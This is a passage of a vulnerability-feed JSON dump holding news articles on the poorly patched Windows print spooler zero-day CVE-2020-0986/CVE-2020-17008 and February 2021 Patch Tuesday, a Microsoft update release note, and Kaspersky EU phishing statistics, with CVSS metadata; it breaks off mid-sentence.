phishing attacks around the world during the reporting period.\n\n_EU share of phishing detections, April 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19125028/15-en-european-ksb-2021.png>))_\n\n### Threat geography\n\nDuring the reporting period, approximately **13.4%** users of Kaspersky solutions in the EU encountered at least one phishing attack.\n\n_Geography of EU phishing, April 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19125056/14-en-european-ksb-2021.png>))_\n\n**Top 10 EU countries where users faced phishing attacks**\n\n| **Country** | **%*** \n---|---|--- \n1 | Portugal | 18.34 \n2 | France | 17.98 \n3 | Belgium | 15.10 \n4 | Greece | 14.98 \n5 | Hungary | 14.87 \n6 | Italy | 14.44 \n7 | Slovakia | 12.77 \n8 | Spain | 12.74 \n9 | Poland | 12.47 \n10 | Latvia | 12.26 \n \n_* The share of unique users targeted by phishing attacks in the total number of unique users of Kaspersky products in the country._\n\n### Organizations under attack\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an e-mail message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nPandemic-related events affected the distribution of phishing attacks across the categories of targeted organizations. However, the largest categories remained unchanged as they have done for several years: in the EU during reporting period, these were Global Internet portals (16.08%), Online stores (15.73%) and Payment systems (13.67%).\n\n_Share of phishing categories in the EU, April 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19125126/16-en-european-ksb-2021.png>))_\n\n### Top-level domain (TLD) usage\n\nIn the share of EU top-level domains (TLDs), we include all national TLDs belonging to EU member states. In the reporting period, this share amounted to 7.27%.\n\n_Distribution of phishing domains by top-level domain, April 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19125153/17-en-european-ksb-2021.png>))_\n\nThe share decreased significantly (-3 p.p.) at the end of 2020, but in Q1 2021 we observed a slight increase to 5.26%.\n\n_Timeline of share of EU top-level domains, Q2 2020 \u2013 Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19125220/18-en-european-ksb-2021.png>))_\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19134557/eu_flag.jpg>) | **The project leading to this report has received funding from the European Union's Horizon 2020 research and innovation programme under grant agreement No 883464.** \n---|---", "cvss3": {}, "published": "2021-05-26T10:00:32", "type": "securelist", "title": "Kaspersky Security Bulletin 2020-2021. EU statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2020-0609", "CVE-2020-0610", "CVE-2020-0986", "CVE-2020-1380", "CVE-2021-24074", "CVE-2021-24086", "CVE-2021-24094", "CVE-2021-25274", "CVE-2021-25275", "CVE-2021-25276", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-05-26T10:00:32", "id": "SECURELIST:322E7EEAE549CDB14513C2EDB141B8BA", "href": "https://securelist.com/kaspersky-security-bulletin-2020-2021-eu-statistics/102335/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:38:39", "description": "[](<https://thehackernews.com/images/-WK9xrOIlPVc/X-RYcAJN2cI/AAAAAAAABV4/SYDr63wXxioAhyy_OmTToTSb2-lArPb5ACLcBGAsYHQ/s0/windows.jpg>)\n\nGoogle's Project Zero team has made public details of an improperly patched zero-day security vulnerability in Windows print spooler API that could be leveraged by a bad actor to execute arbitrary code.\n\nDetails of the unpatched flaw were revealed publicly after Microsoft failed to rectify it within 90 days of responsible disclosure on September 24.\n\nOriginally tracked as [CVE-2020-0986](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-0986.html>), the flaw concerns an elevation of privilege exploit in the GDI Print / [Print Spooler](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-printing>) API (\"splwow64.exe\") that was reported to Microsoft by an anonymous user working with Trend Micro's Zero Day Initiative (ZDI) back in late December 2019.\n\nBut with no patch in sight for about six months, ZDI ended up posting a public [advisory](<https://www.zerodayinitiative.com/advisories/ZDI-20-663/>) as a zero-day on May 19 earlier this year, after which it was [exploited](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>) in the wild in a campaign dubbed \"[Operation PowerFall](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>)\" against an unnamed South Korean company.\n\n\"splwow64.exe\" is a Windows core system binary that allows 32-bit applications to connect with the 64-bit printer spooler service on 64-bit Windows systems. It implements a Local Procedure Call ([LPC](<https://en.wikipedia.org/wiki/Local_Inter-Process_Communication>)) server that can be used by other processes to access printing functions.\n\n[](<https://thehackernews.com/images/-2-ux57hW8ck/X-RaBqZDyzI/AAAAAAAA3fU/tAWWkpJ90zwym1bZ24XlJIKgzoOu537kgCLcBGAsYHQ/s0/tweet.jpg>)\n\nSuccessful exploitation of this vulnerability could result in an attacker manipulating the memory of the \"splwow64.exe\" process to achieve execution of arbitrary code in kernel mode, ultimately using it to install malicious programs; view, change, or delete data; or create new accounts with full user rights.\n\nHowever, to achieve this, the adversary would first have to log on to the target system in question.\n\nAlthough Microsoft eventually [addressed](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0986>) the shortcoming as part of its June Patch Tuesday update, new findings from Google's security team reveals that the flaw has not been fully remediated.\n\n\"The vulnerability still exists, just the exploitation method had to change,\" Google Project Zero researcher Maddie Stone [said](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) in a write-up.\n\n\"The original issue was an arbitrary pointer dereference which allowed the attacker to control the src and dest pointers to a memcpy,\" Stone [detailed](<https://twitter.com/maddiestone/status/1341781305126612995>). \"The 'fix' simply changed the pointers to offsets, which still allows control of the args to the memcpy.\"\n\nThe newly reported elevation of privilege flaw, identified as CVE-2020-17008, is expected to be resolved by Microsoft on January 12, 2021, due to \"issues identified in testing\" after promising an initial fix in November.\n\nStone has also shared a proof-of-concept (PoC) exploit code for CVE-2020-17008, based off of a PoC released by Kaspersky for CVE-2020-0986\n\n\"There have been too many occurrences this year of zero-days known to be actively exploited being fixed incorrectly or incompletely,\" Stone [said](<https://twitter.com/maddiestone/status/1341781305126612995>). \"When [in the wild] zero-days aren't fixed completely, attackers can reuse their knowledge of vulnerabilities and exploit methods to easily develop new zero-days.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-24T09:01:00", "type": "thn", "title": "Google Discloses Poorly-Patched, Now Unpatched, Windows 0-Day Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986", "CVE-2020-17008"], "modified": "2020-12-28T06:17:30", "id": "THN:279CDD851D8F33C8B07217F8D20F6AAA", "href": "https://thehackernews.com/2020/12/google-discloses-poorly-patched-now.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2022-08-24T11:29:11", "description": "None\n**NEW 8/5/21 \nEXPIRATION NOTICE****IMPORTANT **As of 8/5/2021, this KB is no longer available from Windows Update, the Microsoft Update Catalog, or other release channels. We recommend that you update your devices to the latest security quality update. \n\n**IMPORTANT **We have been evaluating the public health situation, and we understand this is impacting our customers. In response to these challenges, we are prioritizing our focus on security updates. Starting in May 2020, we are pausing all optional non-security releases (C and D updates) for all the supported versions of Windows client and server products (Windows 10, version 1909 down to Windows Server 2008 SP2).There is no change to the monthly security updates (B release \u2013 Update Tuesday); these will continue as planned to ensure business continuity and to keep our customers protected and productive.\n\n**What's new for Windows 10, version 1909 and Windows 10, version 1903 release notes**Windows 10, versions 1903 and 1909 share a common core operating system and an identical set of system files. As a result, the new features in Windows 10, version 1909 were included in the recent monthly quality update for Windows 10, version 1903 (released October 8, 2019), but are currently in a dormant state. These new features will remain dormant until they are turned on using an _enablement package_, which is a small, quick-to-install \u201cmaster switch\u201d that simply activates the Windows 10, version 1909 features.To reflect this change, the release notes for Windows 10, version 1903 and Windows 10, version 1909 will share an update history page. Each release page will contain a list of addressed issues for both 1903 and 1909 versions. Note that the 1909 version will always contain the fixes for 1903; however, 1903 will not contain the fixes for 1909. This page will provide you with the build numbers for both 1909 and 1903 versions so that it will be easier for support to assist you if you encounter issues.For more details about the enablement package and how to get the feature update, see the [Windows 10, version 1909 delivery options](<https://aka.ms/1909mechanics>) blog.\n\nFor more information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following article.**Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n## Highlights\n\n * Updates to improve security when using Internet Explorer and Microsoft Edge.\n * Updates to improve security when using input devices such as a mouse, keyboard, or stylus.\n * Updates for verifying usernames and passwords.\n * Updates to improve security when using Microsoft Xbox.\n * Updates to improve security when Windows performs basic operations.\n * Updates for storing and managing files.\n * Updates to improve security when using Microsoft Office products.\n\n## Improvements and fixes\n\n## \n\n__\n\nWindows 10, version 1909\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 1903.\n * No additional issues were documented for this release.\n\n## \n\n__\n\nWindows 10, version 1903\n\n**Note **This release also contains updates for Microsoft HoloLens (OS Build 18362.1061) released May 12, 2020. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.\n\nThis security update includes quality improvements. Key changes include:\n\n * Updates the 2020 start date for [daylight saving time](<https://support.microsoft.com/en-us/help/22803/daylight-saving-time>) (DST) in the Kingdom of Morocco.\n * Addresses a security issue described in [CVE-2018-0886](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-0886>) by adding support for the \u201cEncryption Oracle Remediation\u201d policy setting and changing the default value from Vulnerable to Mitigated. For more information about how this might affect your environment if you are using Remote Desktop, see [KB4093492](<https://go.microsoft.com/fwlink/?linkid=866660>).\n * Security updates to Internet Explorer, the Microsoft Scripting Engine, Windows App Platform and Frameworks, Microsoft Graphics Component, Windows Input and Composition, Windows Media, Windows Shell, Microsoft Xbox, Microsoft Edge, Windows Fundamentals, Windows Cryptography, Windows Authentication, Windows Kernel, Windows Linux, Windows Update Stack, Windows Network Security and Containers, Windows Active Directory, Windows Storage and Filesystems, and the Microsoft JET Database Engine.\n\n * If you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\nKnown issues in this update**Symptom**| **Workaround** \n---|--- \nWe have seen social media and news reports related to various issues with KB4556799.| We are actively engaged with customers who are reporting issues. To date, we have not seen widespread issues reflected in telemetry, support data, or customer feedback channels. We continuously investigate all customer feedback and are closely monitoring this situation.**Note **If you experience any issues, we'd like to know. Please provide feedback using the keyboard shortcut **Windows + F **or go to the **Start **menu and select **Feedback Hub **so that we can investigate. \nAfter installing this update on a Windows 10 device with a wireless wide area network (WWAN) LTE modem, reaching the internet might not be possible. However, the Network Connectivity Status Indicator (NCSI) in the notification area might still indicate that you are connected to the internet.| This issue is resolved in KB4559004. \nThe Local Security Authority Subsystem Service (LSASS) file (**lsass.exe**) might fail on some devices with the error message, \u201cA critical system process, C:\\WINDOWS\\system32\\lsass.exe, failed with status code c0000008. The machine must now be restarted.\"| This issue is resolved in KB4565483. \nHow to get this update**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB4552152) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4556799>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4556799](<https://download.microsoft.com/download/0/7/7/077e38c3-a397-43dc-a90e-46f064ddbde4/4556799.csv>). **Note** Some files erroneously have \u201cNot applicable\u201d in the \u201cFile version\u201d column of the CSV file. This might lead to false positives or false negatives when using some third-party scan detection tools to validate the build.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T07:00:00", "type": "mskb", "title": "May 12, 2020\u2014KB4556799 (OS Builds 18362.836 and 18363.836) - EXPIRED", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0886", "CVE-2020-0986"], "modified": "2020-06-09T07:00:00", "id": "KB4556799", "href": "https://support.microsoft.com/en-us/help/4556799", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-12-24T21:57:52", "description": "A high-severity Windows zero-day that could lead to complete desktop takeover remains dangerous after a \u201cfix\u201d from Microsoft failed to adequately patch it.\n\nThe local privilege-escalation bug in Windows 8.1 and Windows 10 (CVE-2020-0986) exists in the Print Spooler API. It could allow a local attacker to elevate privileges and execute code in the context of the current user, according to [Microsoft\u2019s advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0986>) issued in June. An attacker would first have to log on to the system, but could then run a specially crafted application to take control of an affected system.\n\n\u201cThe issue arises because the Windows kernel fails to properly handle objects in memory,\u201d the firm said. \u201cAn attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\u201d\n\n[](<https://threatpost.com/2020-reader-survey/161168/>)\n\nThe bug rates 8.3 out of 10 on the CVSS vulnerability-severity scale.\n\nFrom a more technical perspective, \u201cthe specific flaw exists within the user-mode printer driver host process splwow64.exe,\u201d according to [an advisory](<https://www.zerodayinitiative.com/advisories/ZDI-20-663/>) from Trend Micro\u2019s Zero Day Initiative (ZDI), which reported the bug to Microsoft last December. \u201cThe issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer.\u201d\n\nThe issue remained unpatched for six months. In the meantime, Kaspersky observed it being [exploited in the wild](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>) in May against a South Korean company, as part of an exploit chain that also used a remote code-execution zero-day bug in Internet Explorer. That campaign, dubbed Operation Powerfall, was believed to be initiated by the advanced persistent threat (APT) [known as Darkhotel](<https://threatpost.com/who-attacked-possible-apt-covid-19-cyberattacks-double/154083/>).\n\nMicrosoft\u2019s June update included a patch that \u201caddresses the vulnerability by correcting how the Windows kernel handles objects in memory.\u201d However, Maddie Stone, researcher with Google Project Zero, has now disclosed that the fix was faulty, after Microsoft failed to re-patch it within 90 days of being alerted to the problem.\n\n\u201cMicrosoft released a patch in June, but that patch didn\u2019t fix the vuln,\u201d [she tweeted](<https://twitter.com/maddiestone/status/1341781306766573568>) on Wednesday. \u201cAfter reporting that bad fix in Sept. under a 90-day deadline, it\u2019s still not fixed.\u201d\n\nShe added, \u201cThe original issue was an arbitrary pointer dereference which allowed the attacker to control the src and dest pointers to a memcpy. The \u2018fix\u2019 simply changed the pointers to offsets, which still allows control of the args to the memcpy.\u201d\n\nMicrosoft has issued a new CVE, [CVE-2020-17008](<https://www.cybersecurity-help.cz/vdb/SB2020122401>), and researchers expect a patch in January. Project Zero meanwhile has issued [public proof-of-concept code](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) for the issue.\n\n**Download our exclusive **[**FREE Threatpost Insider eBook**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=FEATURE&utm_medium=FEATURE&utm_campaign=Nov_eBook>) _**Healthcare Security Woes Balloon in a Covid-Era World**_** , sponsored by ZeroNorth, to learn more about what these security risks mean for hospitals at the day-to-day level and how healthcare security teams can implement best practices to protect providers and patients. Get the whole story and **[**DOWNLOAD the eBook now**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)** \u2013 on us!**\n", "cvss3": {}, "published": "2020-12-24T16:31:38", "type": "threatpost", "title": "Windows Zero-Day Still Circulating After Faulty Fix", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0986", "CVE-2020-17008"], "modified": "2020-12-24T16:31:38", "id": "THREATPOST:52B00377F0B400F0EFF0B3C4FF948F6F", "href": "https://threatpost.com/windows-zero-day-circulating-faulty-fix/162610/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-09T22:45:30", "description": "Microsoft has addressed nine critical-severity cybersecurity bugs in February\u2019s Patch Tuesday updates, plus an important-rated vulnerability that is being actively exploited in the wild.\n\nSix of the security holes \u2013 including one of the critical bugs \u2013 were already publicly disclosed.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nOverall, the computing giant has released patches for 56 CVEs covering Microsoft Windows components, the .NET Framework, Azure IoT, Azure Kubernetes Service, Microsoft Edge for Android, Exchange Server, Office and Office Services and Web Apps, Skype for Business and Lync, and Windows Defender.\n\n## **Actively Exploited Security Bug in Windows Kernel**\n\nThe security bug tracked as [CVE-2021-1732](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732>)** **is being actively exploited, according to Microsoft\u2019s advisory. It carries a vulnerability-severity rating of 7.8 on the CVSS scale, making it important in severity \u2013 however, researchers said it deserves attention above some of the critical bugs in terms of patching priority.\n\nIt exists in the Windows Win32k operating system kernel and is an elevation-of-privilege (EoP) vulnerability. It would allow a logged-on user to execute code of their choosing with higher privileges, by running a specially crafted application. If successful, attackers could execute code in the context of the kernel and gain SYSTEM privileges, essentially giving the attacker free rein to do whatever they wanted on the compromised machine.\n\n\u201cThe vulnerability affects Windows 10 and corresponding server editions of the Windows OS,\u201d said Chris Goettl, senior director of product management and security at Ivanti. \u201cThis is a prime example of why risk-based prioritization is so important. If you base your prioritization off of vendor severity and focus on \u2018critical\u2019 you could have missed this vulnerability in your prioritization. This vulnerability should put Windows 10 and Server 2016 and later editions into your priority bucket for remediation this month.\u201d\n\n## **Critical Microsoft Bugs for February Patch Tuesday**\n\nNone of the critical bugs rate more than an 8.8 (out of 10) on the CVSS scale, but all allow for remote code execution (RCE) and many should take top priority, according to security researchers.\n\n * ### Publicly Known .NET Core/Visual Studio Bug\n\nFor instance, the bug tracked as [CVE-2021-26701](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26701>) exists in .NET Core and Visual Studio \u2013 it\u2019s the only critical-rated bug to be listed as publicly known.\n\n\u201cWithout more information from Microsoft, that\u2019s about all we know about it,\u201d said Dustin Childs, of Trend Micro\u2019s Zero Day Initiative, in [an analysis](<https://www.zerodayinitiative.com/blog/2021/2/9/the-february-2022-security-update-review>) released Tuesday. \u201cBased on the CVSS severity scale, this could allow remote, unauthenticated attackers to execute arbitrary code on an affected system. Regardless, if you rely on the .NET Framework or .NET Core, make sure you test and deploy this one quickly.\u201d\n\n * ### **Windows Fax Bugs**\n\nOther critical bugs should be on researchers\u2019 radars. The bugs tracked as [CVE-2021-1722](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1722>) and [CVE-2021-24077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24077>) meanwhile are both Windows Fax Service RCE problems.\n\n\u201cWindows Fax Service specifies settings for faxes, including how they are sent, received, viewed and printed,\u201d said Eric Feldman, senior product marketing manager at Automox. \u201cThe Windows Fax Service is used by the Windows Fax and Scan application included in all versions of Microsoft Windows 7, Windows 8 and Windows 10 and some earlier versions.\u201d\n\nAn attacker who successfully exploited either vulnerability could take control of an affected system, and then be able to install programs; view, change or delete data; or create new accounts with full user rights.\n\n\u201cUsers whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,\u201d Feldman said. \u201cEven if you do not use Windows Fax and Scan, the Windows Fax Services is enabled by default.\u201d\n\n * ### **Critical TCP/IP Bugs**\n\n[CVE-2021-24074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24074>) and [CVE-2021-24094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24094>) are both Windows TCP/IP RCE vulnerabilities. The former is found in the way Windows handles iPv4 source routing; the latter is found in the way Windows handles iPv6 packet reassembly.\n\n\u201cIPv4 source routing\u2026should be disabled by default,\u201d said Childs. \u201cYou can also block source routing at firewalls or other perimeter devices. The IPv6 bug involves packet fragmentation where a large number of fragments could lead to code execution.\u201d\n\nResearchers said that both these patches should be prioritized.\n\n\u201cBecause these affect the network stack, require zero interaction from a user and can be exploited by sending malicious network traffic to a device, it\u2019s only a matter of time before we see attackers leveraging these vulnerabilities to carry out cyberattacks,\u201d Chris Hass, director of information security and research at Automox, said.\n\nKevin Breen, director of cyber threat research at Immersive Labs, said that the IPv6 security hole is an obvious target for hackers.\n\n\u201cCVE-2021-24094 would be an obvious target because it affects a network stack, which typically operates with system level permissions and could therefore gain an attacker a system shell,\u201d he said. \u201cAs an IPV6 Link local attack it would require the threat actor to already have a foothold in your network, but could ultimately lead to a high level of access on domain controllers, for example. This vulnerability would be most dangerous to those who operate a flat network. Segmentation will help with mitigation.\u201d\n\nBreen also pointed out that RCE isn\u2019t the only possible outcome of an exploit for this bug.\n\n\u201cThe release notes indicate that the exploit is \u2018complex\u2019 \u2013 which means attempted attacks may serve to cause systems to crash, giving it the potential to be used in a denial-of-service attack,\u201d he said.\n\n * ### **Flaw in Windows Codec Pack**\n\nWindows Camera Codec Pack is home to yet another critical RCE bug ([CVE-2021-24091](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24091>)). If successfully exploited, an attacker could run arbitrary code in the context of the current user.\n\n\u201cIf the current user is logged on with admin privileges, the attacker could gain control of the affected system,\u201d said Justin Knapp, senior product marketing manager at Automox. \u201cThis could enable an attacker to install programs; view, change, or delete data; or create new accounts with full user rights. Exploitation of the vulnerability requires the user to open a specially crafted file with an affected version of the codec pack. While there\u2019s no way to force a user to open the file, bad actors could manipulate a user through an email or web-based attack vector where the user is effectively convinced or enticed into opening the malicious file.\u201d\n\n * ### **Windows DNS Problems**\n\nAnd Windows Domain Name System (DNS) servers, when they fail to properly handle requests, are also open to a critical RCE bug ([CVE-2021-24078](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24078>)) that could allow an attacker to run arbitrary code in the context of the Local System Account.\n\n\u201cOnly Windows servers that are configured as DNS servers are at risk of having this vulnerability exploited,\u201d Knapp said. \u201cTo exploit the vulnerability, an unauthenticated attacker could send malicious requests to the Windows DNS server. Given the low level of attack complexity and \u2018exploitation more likely\u2019 label assigned, this is a vulnerability that should be addressed immediately.\u201d\n\n * ### **Windows Print Spooler**\n\nAlso of note, _[CVE-2021-24088](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24088>)_ affects the Windows Local Spooler, which is an important component within the Windows operating system that stores print jobs in memory until the printer is ready to accept them.\n\nIt\u2019s a bug that \u201ccould be a big concern,\u201d according to Allan Liska, senior security architect at Recorded Future.\n\n\u201cThis vulnerability impacts Windows 7 to 10 and Windows Server 2008 to 2019,\u201d he said. \u201cWindows Print Spooler vulnerabilities have been widely exploited in the wild going back to the days of Stuxnet. Just last year CVE-2020-0986 was seen by Kaspersky being [widely exploited in the wild.](<https://threatpost.com/windows-zero-day-circulating-faulty-fix/162610/>)\u201d\n\n * ### **Other Critical February 2021 Microsoft Bugs**\n\nAnd finally, .NET Core for Linux is also at risk for RCE ([CVE-2021-24112](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24112>)); and [CVE-2021-24093](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24093>) is a critical RCE vulnerability in the Windows graphic component. Details are scant for both, but of the latter, Breen said, \u201cThis is the kind of vulnerability built into exploit kits and triggered by low level phishing campaigns targeting users en masse.\u201d\n\nAnd, a critical bug that would allow RCE exists in the Microsoft Windows Codecs Library ([CVE-2021-24081](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24081>)). Details are sparse, but Microsoft said that the difficulty required for exploitation is considered to be low. However, end-user interaction is required for successful exploitation.\n\n### **Publicly Disclosed Bugs of Note**\n\nOutside of the critical issues, [CVE-2021-1733](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1733>) is a high-severity EoP vulnerability discovered to be impacting Sysinternals PsExec utility that deserves a look. It\u2019s listed as being publicly disclosed.\n\n\u201cPsExec which has been popular in the past for use in remote administration tasks such as patching remote systems, has also had a fair share of scrutiny due the utility\u2019s weaponization by criminals in malware,\u201d Nicholas Colyer, senior product marketing manager at Automox, said via email. \u201cProof-of-concept code has not been independently verified but it is notable that in January 2021, Microsoft released a patch to resolve a remote code-execution vulnerability for the same utility, indicating that it is getting attention. Robust endpoint management is necessary for any organization\u2019s continued success and it is advisable to consider alternatives in the modern era of software-as-a-service.\u201d\n\nThe other publicly reported vulnerabilities this month are [CVE-2021-1727](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1727>), an EoP vulnerability in Windows Installer; [CVE-2021-24098](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24098>), a DoS vulnerability in the Windows Console Driver; [CVE-2021-24106](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24106>), an information-disclosure vulnerability in Windows DirectX; and [CVE-2021-1721](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1721>), a .NET Core and Visual Studio DoS problem.\n\n## **Zerologon Redux**\n\nMicrosoft also again released the patch for the Netlogon vulnerability (CVE-2020-1472), which originally was resolved in August. The vulnerability has [consistently been exploited](<https://threatpost.com/microsoft-warns-zerologon-bug/160769/>) by threat actors, so the re-release serves to highlight its importance. Microsoft also starting Tuesday [began blocking by default](<https://threatpost.com/microsoft-implements-windows-zerologon-flaw-enforcement-mode/163104/>) any vulnerable connections on devices that could be used to exploit the flaw. It does this by enabling domain controller \u201cenforcement mode.\u201d\n\n\u201cWhen you consider that Zerologon led the U.S. government to issue an Emergency Directive to all federal agencies to promptly apply the patches for this vulnerability, you start to understand the gravity of the situation,\u201d Satnam Narang, staff research engineer at Tenable, told Threatpost. \u201cZerologon provides attackers a reliable way to move laterally once inside a network, giving them the ability to impersonate systems, alter passwords, and gain control over the proverbial keys to the kingdom via the domain controller itself.\u201d\n\nHe added, \u201cFor these reasons, Zerologon has been rolled into attacker playbooks, becoming a feather in the cap for post-compromise activity. We\u2019ve also seen reports of Zerologon being favored by ransomware groups like Ryuk during their campaigns.\u201d\n\n## **What Should IT Patch First?**\n\n\u201cWindows OS updates and [Adobe Acrobat and Reader](<https://threatpost.com/critical-adobe-windows-flaw/163789/>) need immediate attention with the list of exploited 